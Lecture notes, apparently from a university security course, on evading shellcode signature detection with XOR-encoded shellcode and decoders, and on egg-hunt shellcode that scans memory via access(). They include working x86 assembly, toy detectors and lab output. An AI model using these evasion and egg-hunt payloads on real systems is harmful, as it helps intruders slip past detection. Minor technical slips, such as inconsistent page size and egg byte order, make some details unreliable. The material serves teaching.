Lec. 13: Obfuscating Shell Code and Egg Hunting

1. Signature Matching Defenses
2. Obfuscating Shell Code
- 2.1. Simple Push Based Obfuscation
- 2.2. Decoder Obfuscated Shell Code
3. Egg-Hunt Shell Code

1 Signature Matching Defenses

Continuing our discussion of advanced shell code. In the last class we reduced the size of our shell code from 37 bytes to 21, but sometimes it is not the size of the shell code, but the content. For example, modern intrusion detection systems may scan the contents of program for "/bin/sh" or even "sh" to try and stop shell code. Here's a really simple example code:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char * argv[]){

  if(argc < 2){
    printf("ERROR: Require argument\n");
    exit(1);
  }

  char * p;
  for(p=argv[1];*p;p++){

    //check for any "sh" so not to be exploited!
    if (strncmp(p,"sh",2) == 0){
      printf("No way Jose!\n");
      exit(2);
    }
  }

  //execute as binary code
  ((void(*)(void)) argv[1])();

  return;
}

This code will balk whenever the input string contains the word "sh" as needed for our shell code.

As you can see, in our 21 byte shell code, we are going to have a problem getting passed the signature:

user@si485H-base:demo$ ./sig_matcher $(printf `./hexify.sh smallest_shell`)
No way Jose!

This is a toy example, but such a program could compare against any kind of input type to match shell code. This is called signature matching and it is a common defense to prevent exploits. Here's a more complex signature matching scheme:

user@si485H-base:demo$ cat execve_sigmatcher.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>


//check for the sig0 start finished by sig1 in str
int check_sig(char *str, char * sig0,char *sig1){

  char *p,*q;

  for(p=str;*p;p++){

    //checking for start of signature
    if ( strncmp(p,sig0,strlen(sig0)) == 0 ){

      //checking for end of signature
      for(q=p;*q;q++){
        if (strncmp(q,sig1,strlen(sig1)) == 0){
          return 1;//found signature
        }
      }
    }
  }

  return 0; //did not find signautre


}

int main(int argc, char * argv[]){

  if(argc < 2){
    printf("ERROR: Require argument\n");
    exit(1);
  }

  //                      mov al,0xb   int 0x80
  if ( check_sig(argv[1], "\xb0\x0b", "\xcd\x80") ||
       //                xor ecx,ecx  int 0x80
       check_sig(argv[1], "\x31\xc9", "\xcd\x80")){

    printf("No Way Jose!\n");
    exit(2);
  }

  //execute as binary code
  ((void(*)(void)) argv[1])();

  return;
}

In this scheme, the signature is looking for some possibly shell code indicative instruction, like mov al, 0xb or xor ecx,ecx which is followed by an int 0x80 at some point later. This signature is, clearly, a lot harder to defeat with the shell code we've been using so far. What to do?!

2 Obfuscating Shell Code

In the community, it is generally considered that signature matching schemes can be easily defeated with obfuscated and polymorphic shell code. In these variants, the shell code is some how changed dynamically such that it will pass a signature matching scheme.

We will focus on simple obfuscated shell code scheme which will encode the shell code portion the program and then use a decoder to decode the shell code prior to execution. You can imagine expanding this scheme to polymorphic shell code, where by each version of the shell code changes … but that might be a discussion for another day (or year).

2.1 Simple Push Based Obfuscation

To start, let's make the observation that we can rewrite our shell code for our 21 byte shell code using a series of push commands followed by a call to esp (or a jmp).

Here are the bytes to our small shell code from objdump:

8048060:	31 c9                	xor    ecx,ecx
 8048062:	f7 e1                	mul    ecx
 8048064:	50                   	push   eax
 8048065:	68 6e 2f 73 68       	push   0x68732f6e
 804806a:	68 2f 2f 62 69       	push   0x69622f2f
 804806f:	89 e3                	mov    ebx,esp
 8048071:	b0 0b                	mov    al,0xb
 8048073:	cd 80                	int    0x80

First, I want to conver this into little-endian encode 4-byte sequences that I can push onto the stack. I've written a script to do this le-foourbyte.py and is provided in the classed tools directory. Here's an example of using it on this shell code:

user@si485H-base:demo$ printf $(./hexify.sh smallest_shell) | ./le-fourbytes.py -
0xe1f7c931
0x2f6e6850
0x2f686873
0x8969622f
0xcd0bb0e3
0x90909080

As you can see, if you look closely, that all the bytes are there encoded into little endian.

Now, to use this in another version of the shell code, we will want push in reverse order, and we can use the tac command (cat backwards) to print this in reverse:

user@si485H-base:demo$ printf $(./hexify.sh smallest_shell) | ./le-fourbytes.py - | tac
0x90909080
0xcd0bb0e3
0x8969622f
0x2f686873
0x2f6e6850
0xe1f7c931

And, then we can dump this into some shell code:

section .text
        global _start
_start: 
        push 0x90909080
        push 0xcd0bb0e3
        push 0x8969622f
        push 0x2f686873
        push 0x2f6e6850
        push 0xe1f7c931
        call esp

And now, we pass the simple sigchecks from before because we split up the int 0x80 instruction bytes.

user@si485H-base:demo$ ./execve_sigmatcher $(printf `./hexify.sh push_shell`)
$

But, surprisingly, we still fail the more naive checking for "sh"

user@si485H-base:demo$ ./simple_sigmatcher $(printf `./hexify.sh push_shell`)
No way Jose!

We need to do a bit more work.

2.2 Decoder Obfuscated Shell Code

The next step in obfuscation is to actually encode the bytes of the shell code in some way, push them onto the stack, and then decode them at run time. We will use a very basic encoding scheme that will xor the bytes with a key. It's important that the key does not exist in the shell code, otherwise we may introduce a null byte.

I don't see any 0xFF in the shell code, so we will use that as the key, essentially inverting the bytes. The le-fourbytes.py script will do this too:

user@si485H-base:demo$ printf $(./hexify.sh smallest_shell) | ./le-fourbytes.py - 0xFF | tac
0x6f6f6f7f
0x32f44f1c
0x76969dd0
0xd097978c
0xd09197af
0x1e0836ce

That looks good. Now, all we need to do is write a decoder in assembly that will step through and invert all the bytes on the stack before calling esp.

SECTION .text
        global _start

_start:
        ;; push encoded shell code
        push 0x6f6f6f7f
        push 0x32f44f1c
        push 0x76969dd0
        push 0xd097978c
        push 0xd09197af
        push 0x1e0836ce         ;24=6*4 bytes long


        ;; DECODER

        xor eax,eax,            ;zero out eax
        xor ecx,ecx             ;zerp out ecx
        mov cl,0x18             ;set ecx to 24, length of shell code
decode:
        mov al,[esp+ecx-1]      ;load byte at front int al
        xor al,0xff             ;decode byte
        mov [esp+ecx-1],al      ;write byte back
        loop decode             ;decrement ecx and jmp to decode until ecx is zero

        call esp                ;call esp to execute shell code

There are few new assembly instructions, but most should be familiar. The new instruction is loop, which will do an condition jump based on the value of ecx register and also decrement ecx. Once ecx is zero, it will no longer jump.

In total, this shell code is one part pushing on the encoded shell code and one part decoding that shell code. Once the shell code is decoded, we can call esp and execute the shell code.

user@si485H-base:demo$ ./encoded_shell 
$

And this will pass all our signature matchers:

user@si485H-base:demo$ ./simple_sigmatcher $(printf `./hexify.sh encoded_shell`)
$ 
user@si485H-base:demo$ ./execve_sigmatcher $(printf `./hexify.sh encoded_shell`)
$

But, you might be thinking, wait, couldn't write signatures that match the decoder? Of course, but then we can write more obfuscated decoders, and then they can write signatures for that, and we obfuscate again, and then more signatures, etc. This is why a signature scheme will always fail in the long run.

3 Egg-Hunt Shell Code

Let's consider another technique for subverting signature matching scheme called the egg hunt. In the egg hunt, we consider a scenario where we can't easily upload our shell code in a way that will execute. This could occur because either there isn't enough space in the overflow buffer for the shell code, or that there are good signature matching schemes in place. Either way, we are currently hosed in getting our shell code to execute directly.

However, all may not be loss. Even if we can't get our shell code to execute, we may be able to get it into the memory address space of the program and get some other piece of code to execute for the buffer overrun, one that fits in the buffer or doesn't match a current signature. The challenge now is, how do we eventually execute our shell code? And, more precisely, how do we find it in memory?

This is the so called "egg hunt!" What we can do is plant an egg in our shell code, and have another piece of software search the entire memory address space searching for it.

3.1 Determining a Good Egg

A good egg should have two properties: (1) it should consist of nop like instructions so that it doesn't affect the shell code, and (2), it should be doubled.

For the first, a typical egg that we will use is 0x50905090. You'll notice that byte 0x90 is a nop, and 0x50 is incr eax so essentially a nop. This is a nice egg because once we find the egg, we want to jmp to that execution.

The other important part of an egg, is that it must apear twice. For example, here is are huntable shell code:

SECTION .text                   ; Code section
                 global _start  ; Make label available to linker
_start:
        db 0x50,0x90,0x50,0x90  ; egg target
        db 0x50,0x90,0x50,0x90
        xor ecx,ecx
        mul ecx                 ;0's edx and and eax
        push eax                ;\0
        push 0x68732f6e         ;n/sh
        push 0x69622f2f         ;//bi 


        mov ebx,esp             ; Param #1 - "/bin/sh" is *esp
        mov al,0xb              ; System call number for execve
        int 0x80                ; Interrupt 80 hex - invoke system call

The reason it must apear in duplicate is that the egg hunt shell code must also have a copy of the egg because it will be using it in a comparison. Thus, to differentiate the egg hunter from its pray, the pray has the egg twice.

3.2 How to Hunt and Egg

With the egg figured out and our huntable shell code, let's focus our attention on the egg unter. For this, we need two processes:

We need to be able to iterate through the entire memory address space, from 0x0000000 to 0xFFFFFFFFF, FAST!
We need to be able to see if an address can be dereferenced without causing a segmentation fault.

For (1), we need to think about how memory is aligned. Each memory region is broken into pages, and pages are bounded by 1024 bytes. This means that we jump by 1024 bytes for each address if the address is not referenced.

For (2), this is a bit more tricky. We can't just dereference the address ourselves because that will cause a segfault, but we might be able to ask the operating system to check. The access() system call is exactly the right tool for this job.

Normally, access will check if you have access to the specified file. Here' is the manual description:

SYNOPSIS
       #include <unistd.h>

       int access(const char *pathname, int mode);

DESCRIPTION
       access() checks whether the calling process can access the file pathname.  
       If pathname is a symbolic link, it is dereferenced.

We hand it a path name as a reference to a string, an address, and the operating system will dereference that address. If the address is not accesible, the system call will fail with EFAULT

EFAULT pathname points outside your accessible address space.

BUT, it will not segfault! So we can use access() to hunt out accessible address spaces. Here's some C code that does that, and once it finds the egg, it executes it.

#include <stdio.h>
#include <unistd.h>
#include <errno.h>

int main(int argc, char *argv[]){

  unsigned int p = 0x0000000;
  unsigned int egg = 0x90509050;

  //egg hunt
  while(1){

    //peform an acess
    access( (char *) p+4, 0);
    //check if we EFAULT or not (readible memory or not)
    if ( errno != EFAULT){

      //treat p as a integer pointer
      unsigned int * q = (unsigned int *) p;

      //check for egg twice in a row
      if (q[0] == 0x90509050 &&
          q[1] == 0x90509050){
        //execute the shell code if found
        ((void(*)(void)) q)();
      }

      p++;
    }else{
      //if segfaulting move at page boundry
      p |= 0xfff; //1 out last 12 bits, 
      p += 1; //add 1 to cause an overflow to move in 4096 boundaries
    }

  }


}

And if we run this dummy code like so:

user@si485H-base:demo$ ./dummy_hunt $(printf $(./hexify.sh huntable_shell))

The huntable_shell is a command line argument, which means it is loaded into the memory of the program. The egg hunter will find the shell code, eventually, and drop us into the shell. How long does it take?

user@si485H-base:demo$ time ./dummy_hunt $(printf $(./hexify.sh huntable_shell)) < /dev/null

real	0m9.038s
user	0m0.628s
sys	0m6.568s

That long. Which is pretty fast, but not soo fast.

3.3 Putting it all together

Ok, now that we have a sense of how to hunt an egg, let's translate that logic into assembly and write an egg hunt shell code:

SECTION .text
        global _start

_start:
        mov ebx, 0x90509050     ;store value of egg
        xor ecx,ecx             ;clear registers ecx
        mul ecx                 ;clear register edx,eax

j1:     or dx,0xfff             ;move in page boundaries by 4096 byte boundaries

j2:     inc edx,                ; move by 1

        pusha                   ;save registers on stack
        lea ebx,[edx+0x4]       ;load address 4 bytes for ebx
        mov al,0x21             ;set up access()
        int 0x80                ;system call

        cmp al,0xf2             ;compare to -14 EFAULT
        popa                    ;restore register state from stack

        jz j1                   ;if EFAULT, move in page boundary

        cmp [edx],ebx           ;check for first egg
        jnz j2                  ;jump if not there

        cmp [edx+0x4],ebx       ;check for second egg
        jnz j2                  ;jump if not there

        jmp edx                 ;found egg, jump to egg

Now, we can use our dummy exploit, with our egg hunt shell code and our huntable shell code to see it work together:

./dummy_exploit $(printf $(./hexify.sh egg_hunt)) $(printf $(./hexify.sh huntable_shell))

The first argument will be executed by the dummy_exploit program, which will find the huntable shell code, the second argument. How long does it take?

user@si485H-base:demo$ time ./dummy_exploit $(printf $(./hexify.sh egg_hunt)) $(printf $(./hexify.sh huntable_shell)) < /dev/null

real	0m10.775s
user	0m1.776s
sys	0m7.192s

Notice, most of that is the system call. And, if you run this with strace, you can see that happening.

user@si485H-base:demo$  strace -e raw=access ./dummy_exploit $(printf $(./hexify.sh egg_hunt)) $(printf $(./hexify.sh huntable_shell))
ccess(0x8ed2004, 0)                    = -1 (errno 14)
access(0x8ed3004, 0)                    = -1 (errno 14)
access(0x8ed4004, 0)                    = -1 (errno 14)
access(0x8ed5004, 0)                    = -1 (errno 14)
access(0x8ed6004, 0)                    = -1 (errno 14)
access(0x8ed7004, 0)                    = -1 (errno 14)
access(0x8ed8004, 0)                    = -1 (errno 14)
access(0x8ed9004, 0)                    = -1 (errno 14)
access(0x8eda004, 0)                    = -1 (errno 14)
access(0x8edb004, 0)                    = -1 (errno 14)
access(0x8edc004, 0)                    = -1 (errno 14)
access(0x8edd004, 0)                    = -1 (errno 14)
access(0x8ede004, 0)                    = -1 (errno 14)
access(0x8edf004, 0)                    = -1 (errno 14)
access(0x8ee0004, 0)                    = -1 (errno 14)
access(0x8ee1004, 0)                    = -1 (errno 14)
access(0x8ee2004, 0)                    = -1 (errno 14)
access(0x8ee3004, 0)                    = -1 (errno 14)
access(0x8ee4004, 0)                    = -1 (errno 14)
access(0x8ee5004, 0)                    = -1 (errno 14)
access(0x8ee6004, 0)                    = -1 (errno 14)
access(0x8ee7004, 0)                    = -1 (errno 14)
access(0x8ee8004, 0)                    = -1 (errno 14)
access(0x8ee9004, 0)                    = -1 (errno 14)
access(0x8eea004, 0)                    = -1 (errno 14)
access(0x8eeb004, 0)                    = -1 (errno 14)
access(0x8eec004, 0)                    = -1 (errno 14)
(...)

Pausing … this is moving at the page boundary, every 4096 bytes. This region of memory is not accessible, but eventually …

(...)
ccess(0xb7e38d2c, 0)                   = -1 (errno 2)
access(0xb7e38d2d, 0)                   = -1 (errno 2)
access(0xb7e38d2e, 0)                   = -1 (errno 2)
access(0xb7e38d2f, 0)                   = -1 (errno 2)
access(0xb7e38d30, 0)                   = -1 (errno 2)
access(0xb7e38d31, 0)                   = -1 (errno 2)
access(0xb7e38d32, 0)                   = -1 (errno 2)
access(0xb7e38d33, 0)                   = -1 (errno 2)
access(0xb7e38d34, 0)                   = -1 (errno 2)
access(0xb7e38d35, 0)                   = -1 (errno 2)
access(0xb7e38d36, 0)                   = -1 (errno 2)
access(0xb7e38d37, 0)                   = -1 (errno 2)
access(0xb7e38d38, 0)                   = -1 (errno 2)
access(0xb7e38d39, 0)                   = -1 (errno 2)
access(0xb7e38d3a, 0)                   = -1 (errno 2)
access(0xb7e38d3b, 0)                   = -1 (errno 2)
access(0xb7e38d3c, 0)                   = -1 (errno 2)
access(0xb7e38d3d, 0)                   = -1 (errno 2)
access(0xb7e38d3e, 0)                   = -1 (errno 2)
access(0xb7e38d3f, 0)                   = -1 (errno 2)
access(0xb7e38d40, 0)                   = -1 (errno 2)
access(0xb7e38d41, 0)                   = -1 (errno 2)
access(0xb7e38d42, 0)                   = -1 (errno 2)
access(0xb7e38d43, 0)                   = -1 (errno 2)
access(0xb7e38d44, 0)                   = -1 (errno 2)
access(0xb7e38d45, 0)                   = -1 (errno 2)
access(0xb7e38d46, 0)                   = -1 (errno 2)
access(0xb7e38d47, 0)                   = -1 (errno 2)
access(0xb7e38d48, 0)                   = -1 (errno 2)
(...)

You get a region of memory that is accessible, and then you move 1 byte at a type through it checking for the egg. Finally, at some point you find that egg, and you eat it -— I mean you execute the shell.